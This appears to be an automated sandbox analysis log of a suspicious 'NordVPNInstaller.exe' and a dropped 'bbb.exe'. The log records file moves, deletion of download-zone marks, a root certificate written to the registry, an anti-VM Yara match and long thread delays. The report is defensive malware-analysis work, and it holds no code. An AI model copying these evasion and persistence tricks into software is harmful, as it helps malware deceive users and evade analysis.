Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	File opened: C:\Users\user\AppData\Roaming\bbb\bbb.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Moves itself to temp directory

Source: c:\users\user\desktop\nordvpninstaller.exe

File moved: C:\Users\user\AppData\Local\Temp\tmpG356.tmp

Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: NordVPNInstaller.exe PID: 3524, type: MEMORYSTR

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 1300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Memory allocated: 4FD0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Memory allocated: 2BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Memory allocated: 4BA0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Memory allocated: 1880000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Memory allocated: 3230000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Memory allocated: 5230000 memory commit \| memory reserve \| memory write watch

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Window / User API: threadDelayed 1784	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Window / User API: threadDelayed 2016	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Window / User API: threadDelayed 3352	Jump to behavior
Source: C:\Users\user\Desktop\NordVPNInstaller.exe	Window / User API: threadDelayed 1971	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Window / User API: threadDelayed 3229	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Window / User API: threadDelayed 2475	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe	Window / User API: threadDelayed 2556	Jump to behavior
